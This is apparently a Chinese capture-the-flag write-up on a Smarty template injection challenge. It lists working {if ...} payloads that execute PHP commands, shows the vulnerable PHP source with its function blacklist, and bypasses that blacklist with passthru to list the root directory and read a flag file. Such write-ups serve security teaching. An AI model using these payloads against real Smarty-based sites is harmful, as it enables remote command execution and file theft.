打开网址得到一句话
传入参数a=得到一串代码,应该是确实为smarty模板注入
常用payload
{if phpinfo()}{/if}
{if system(‘ls’)}{/if}
{if readfile(’/flag’)}{/if}
{if show_source(’/flag’)}{/if}
{if system(‘cat …/…/…/flag’)}{/if}
smarty中的{if}标签中可以执行php语句
<?php
include('./libs/Smarty.class.php');
echo "pass a parameter and maybe the flag file's filename is random :>";
$smarty = new Smarty();
if($_GET){
highlight_file('index.php');
foreach ($_GET AS $key => $value)
{
print $key."\n";
if(preg_match("/flag|\/flag/i", $value)){
$smarty->display('./template.html');
}elseif(preg_match("/system|readfile|gz|exec|eval|cat|assert|file|fgets/i", $value)){
$smarty->display('./template.html');
}else{
$smarty->display("eval:".$value);
}
}
}
?>
//system|readfile|gz|exec|eval|cat|assert|file|fgets/,这些函数都被过滤了,但是发现passthru()函数没过滤
构造payload:{if passthru('ls')}{/if} //查看当前目录,啥也没有,
构造payload:{if passthru('ls ../.././')}{/if} //进行三级目录穿越到根目录发现有一个_9909的文件
构造payload:{if passthru('tac /_9909')}{/if} //得到flag